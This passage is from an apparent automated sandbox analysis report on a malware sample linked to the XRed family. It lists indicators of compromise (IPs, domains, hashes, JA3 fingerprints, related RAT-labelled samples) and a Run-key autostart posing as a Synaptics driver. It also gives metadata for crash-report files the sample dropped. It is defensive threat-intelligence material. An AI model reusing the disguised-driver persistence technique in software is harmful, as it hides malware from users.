                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, login.live.com, download.microsoft.com.edgekey.net, main.dl.ms.akadns.net, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, officeclient.microsoft.com, download.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, onedscolprdeus15.eastus.cloudapp.azure.com, umwatson.event
                                                                          • Execution Graph export aborted for target Synaptics.exe, PID 4136 because there are no executed function
                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                          • VT rate limit hit for: file.exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          14:28:44API Interceptor617x Sleep call for process: Synaptics.exe modified
                                                                          16:25:30API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                          20:28:44AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          69.42.215.252file.exeGet hashmaliciousXRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousXRedBrowse
                                                                          • 13.107.246.45
                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                          • 13.107.246.45
                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                          • 13.107.246.45
                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                          • 13.107.246.45
                                                                          https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690Get hashmaliciousUnknownBrowse
                                                                          • 13.107.246.45
                                                                          Bootxr.exeGet hashmaliciousXmrigBrowse
                                                                          • 13.107.246.45
                                                                          cici.exeGet hashmaliciousRedLineBrowse
                                                                          • 13.107.246.45
                                                                          intro.avi.exeGet hashmaliciousQuasarBrowse
                                                                          • 13.107.246.45
                                                                          random(6).exeGet hashmaliciousStealcBrowse
                                                                          • 13.107.246.45
                                                                          1.exeGet hashmaliciousXWormBrowse
                                                                          • 13.107.246.45
                                                                          freedns.afraid.orgfile.exeGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                          • 69.42.215.252
                                                                          Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          AWKNET-LLCUSfile.exeGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                          • 69.42.215.252
                                                                          Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252
                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                          • 69.42.215.252
                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                          • 69.42.215.252

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousXRedBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          file.exeGet hashmaliciousXRedBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          file.exeGet hashmaliciousAsyncRAT, XRed, XWormBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          45631.exeGet hashmaliciousNitolBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          45631.exeGet hashmaliciousUnknownBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129
                                                                          1734098836319.exeGet hashmaliciousBlackMoonBrowse
                                                                          • 216.58.206.78
                                                                          • 142.250.186.129

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dlldxwebsetup.exeGet hashmaliciousNeshtaBrowse
                                                                            https://epicgames-download1.akamaized.net/Builds/UnrealEngineLauncher/Installers/Win32/EpicInstaller-15.17.1.msi?launcherfilename=EpicInstaller-15.17.1-unrealEngine.msiGet hashmaliciousUnknownBrowse
                                                                              CuratorStandardSetup.exeGet hashmaliciousUnknownBrowse
                                                                                CuratorStandardSetup.exeGet hashmaliciousUnknownBrowse
                                                                                  https://launcher-public-service-prod06.ol.epicgames.com/launcher/api/installer/download/EpicGamesLauncherInstaller.msi?productName=unrealEngineGet hashmaliciousUnknownBrowse
                                                                                    Palworld.zipGet hashmaliciousUnknownBrowse
                                                                                      Palworld.exeGet hashmaliciousUnknownBrowse
                                                                                        https://launcher-public-service-prod06.ol.epicgames.com/launcher/api/installer/download/EpicGamesLauncherInstaller.msi?productName=unrealEngineGet hashmaliciousUnknownBrowse
                                                                                          https://launcher-public-service-prod06.ol.epicgames.com/launcher/api/installer/download/EpicGamesLauncherInstaller.msi?productName=unrealEngineGet hashmaliciousUnknownBrowse
                                                                                            5b1cxnTnnS.exeGet hashmaliciousUnknownBrowse

                                                                                              Created / dropped Files

                                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                              Download File
                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):118
                                                                                              Entropy (8bit):3.5700810731231707
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                              MD5:573220372DA4ED487441611079B623CD
                                                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_348ac1a0e27e10257094c0b0d8fb7ab45be575f_455b7b6e_9db0888f-550c-4bbd-b29b-383bae563cab\Report.wer

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.1333106359412204
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:T+DVpsjImo0WMn4DzJDzqjLOA/FczxwzuiFvZ24IO8EKDzy:Kyj5WMn4JqjkKzuiFvY4IO8zy
                                                                                              MD5:1FFD851D58875E7ECF7405C1FCBED190
                                                                                              SHA1:185CC3F9561417FD24D16C5E8DF8C52B3AB9D040
                                                                                              SHA-256:A00A3DCF110FF920C096EB60D0695A909A3690C5FCA8A2ABBA696C6F1C3E4468
                                                                                              SHA-512:B53BC64BD8B25FBF48B218B3E3F626BEF39BC16302B65D503641269FB856BE2D9E56DCDB8298DBF7FF311876E312F67401DEFEA85B06F2722D52CE4D1CE2B210
                                                                                              Malicious:false
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.2.6.7.1.0.7.4.6.3.8.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.2.6.7.2.8.8.5.5.7.6.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.b.0.8.8.8.f.-.5.5.0.c.-.4.b.b.d.-.b.2.9.b.-.3.8.3.b.a.e.5.6.3.c.a.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.8.b.c.8.5.a.-.d.d.3.a.-.4.6.b.8.-.9.6.9.0.-.4.f.1.5.f.4.a.9.f.f.3.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.8.-.0.0.0.1.-.0.0.1.4.-.e.5.3.e.-.2.4.8.2.4.c.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.b.4.8.6.0.3.f.6.a.1.d.f.f.a.b.2.f.f.4.5.8.7.8.0.0.2.5.f.6.a.3.c.2.e.5.2.3.c.3.c.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_be67666fe4818bfe38cb6737915ef984fc566b64_455b7b6e_7651781a-e0f4-4624-a8b0-6896943db491\Report.wer

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.1324046746995573
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:Z+hDVps7Im00WbkODzJDzqjLOA/FczxwzuiFvZ24IO8EKDzy:8vy7FWbkOJqjkKzuiFvY4IO8zy
                                                                                              MD5:DD8AC2D307D343152486ADA215568F28
                                                                                              SHA1:9D4D8D59ADC7F19B91C9414773C3BC23710BEF8B
                                                                                              SHA-256:15E13F93ECD3D572909AC659569C16E532068AF6318E6AFCF345F0505914D87D
                                                                                              SHA-512:597930B9673467324F5D5C87A513BBF133157B21112A1416B9781323E4B9E4A7A695DC1523ABFD12E5FAC6805AC1BA8C92D6DC233BDB88B41F5FFAB9EEE9C001
                                                                                              Malicious:false
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.2.6.7.3.4.2.0.1.4.5.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.2.6.7.3.5.2.0.1.4.5.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.6.5.1.7.8.1.a.-.e.0.f.4.-.4.6.2.4.-.a.8.b.0.-.6.8.9.6.9.4.3.d.b.4.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.1.8.d.e.9.7.-.d.e.f.4.-.4.0.0.1.-.b.8.a.6.-.1.3.2.a.7.3.8.d.6.a.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.8.-.0.0.0.1.-.0.0.1.4.-.e.5.3.e.-.2.4.8.2.4.c.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.b.4.8.6.0.3.f.6.a.1.d.f.f.a.b.2.f.f.4.5.8.7.8.0.0.2.5.f.6.a.3.c.2.e.5.2.3.c.3.c.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER1441.tmp.dmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Jan 2 21:25:34 2025, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):209452
                                                                                              Entropy (8bit):2.647630467569494
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:Y/noHm/vfUA/L6/GjvtqfFN94fFpzgw5QImvVMTNsCaP1pJSE:GdTLSpH92pkw5QVGNsCeB
                                                                                              MD5:FEE245F0285AFFF12436DCD2CAEDCE60
                                                                                              SHA1:5B091F7874C09CEAA564ED19E3F7EEC439ED9ACB
                                                                                              SHA-256:DF8E8C160D77D9643678E4257BA31F3138DC7BFF447FE9F518C9598C17EA7712
                                                                                              SHA-512:776FBBC4DB13F32947CE31A7A10CAB74E4FFAC6D959DDBBC23F9B2F2E5AB8FB18E6A73F7E50A770DCB5402F2DA6B7D5911F4B0AF1289444B1935E276166241AB
                                                                                              Malicious:false
                                                                                              Preview:MDMP..a..... .......N.wg............4...............H.......$....&......$....5..........`.......8...........T........... ................'...........)..............................................................................eJ.......)......GenuineIntel............T.......(.....vg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER1655.tmp.WERInternalMetadata.xml

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):6312
                                                                                              Entropy (8bit):3.6966264536424545
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:RSIU6o7wVetb3xs6t7YiSaVDRJl5aMQUz89bddgsfKvqGm:R6l7wVeJ3xs6t7YiSa9pDz89b3gsfKdm
                                                                                              MD5:12A9BE9420D0ADAEDE5967B4630ED5DD
                                                                                              SHA1:E54A0B711A174695842D3BBB1BEBD90B5AA830DC
                                                                                              SHA-256:CDDAA83B95694A739CF4C03A04A72A906A52A271954AB40D4623116437C412A0
                                                                                              SHA-512:73A474A68991632144CE0799C1FA6A104DB0EC93FF5BF99C77C2E173EF552ACFA230A9EC234EF124A513B4CDFB49E79B176B65BDE2EAE6621F98D26AD4564BDA
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.3.6.<./.P.i.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER16E3.tmp.xml

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4572
                                                                                              Entropy (8bit):4.440432162390021
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsVJg77aI9V+nWpW8VYpYm8M4JFoFRO+q84s55OuZid:uIjfvI7HT7VJJmOerOuZid
                                                                                              MD5:BC4EBC07ACA93CEA677AA772B8CC6176
                                                                                              SHA1:49C5175440D3EDE4F106BDE5AAC6BAB440106E52
                                                                                              SHA-256:C0572F1CD10C0CF01437F7BBC56DB234767C80F851DB3336E79BD65DAE8EB357
                                                                                              SHA-512:1619052A3995319B5ABDB9FD568833190976C0428B1054FA6347B3C826AE9DECFE4301F243598BACAC127FF800B8DD2DCEF9FF39AB9B1C53F4320BC0A590ECE2
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658828" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERB846.tmp.dmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Jan 2 21:25:18 2025, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):6402859
                                                                                              Entropy (8bit):2.174305773178595
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:5RkVg8NcAZF8Quh/0/pJBCTz4B35xH4SVogpvy0weBFKhiOemBEg2JWn3Fuk4AEE:5RLAzfdxCbaMZwj26DyYB5bbXvbI6vk
                                                                                              MD5:AF7430C195191F304FB990ECEBC1617B
                                                                                              SHA1:3D39D61178A7B7A5D64F2D95FEF4E8A4BDD5D676
                                                                                              SHA-256:D8CAB7EF57B8633C8E755F7BBC73E2F608F6C5CC882A0E3B44468255D0811BFB
                                                                                              SHA-512:3BC1F962AA7E69762DB7D1ED4D83172B936D58F5347C712B7570E4D4F0C998C174A0B3ED6799DB3C0ADF436F6FCFE6457B680E619184F76528656BE160FAD995
                                                                                              Malicious:false
                                                                                              Preview:MDMP..a..... .......>.wg............4r..............Hy......$..........D7..PN..........`.......8...........T............_..sS_.....................................................................................................eJ..............GenuineIntel............T.......(.....vg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE49.tmp.WERInternalMetadata.xml

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):6312
                                                                                              Entropy (8bit):3.7148420726690055
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R6l7wVeJ3xl6xMmzYiSW3pD089baQsfy+m:R6lXJz63YujajfS
                                                                                              MD5:BC614CFD2E8C82D98A02A8D73E1B1753
                                                                                              SHA1:87B183DC2FB612DEE76FFBB96BB8A7795C636202
                                                                                              SHA-256:21DE50D665BD1F1986B10FDDEE54DF727FC1CFE27FA975C6548AF1B494C6F107
                                                                                              SHA-512:4D1723811618441494F4E6DC0B46F2C004BE9C7A6E5051765C9D0F7140DA3FCACB5C7BB205356BE05E537E3C15B627F427E08B96C2F32A2AE902A7C02BCCF416
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.3.6.<./.P.i.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE69.tmp.xml

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4572
                                                                                              Entropy (8bit):4.445743359919815
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zsVJg77aI9V+nWpW8VYzSoYm8M4JFetFH+q84iz55OuZid:uIjfvI7HT7VtFJi0rOuZid
                                                                                              MD5:5C9E5101E3381FEFCBB33566B2C3AD68
                                                                                              SHA1:F74FE4F27D7561DB03477F430960E29D47A91AA6
                                                                                              SHA-256:217737197CC1A1764429E42199EB6AD671E3485DB0A6358B7A03413929F79450
                                                                                              SHA-512:33ADC99E27AEEF33730A758BAEFDF59B13A3DC98DED63B34FAEBA754145A3FFC9CD2D80C60835E8FD052CA9AE83C484DB5FE4C87D7B51C0CAAB4FD87183D3F1E
                                                                                              Malicious:false
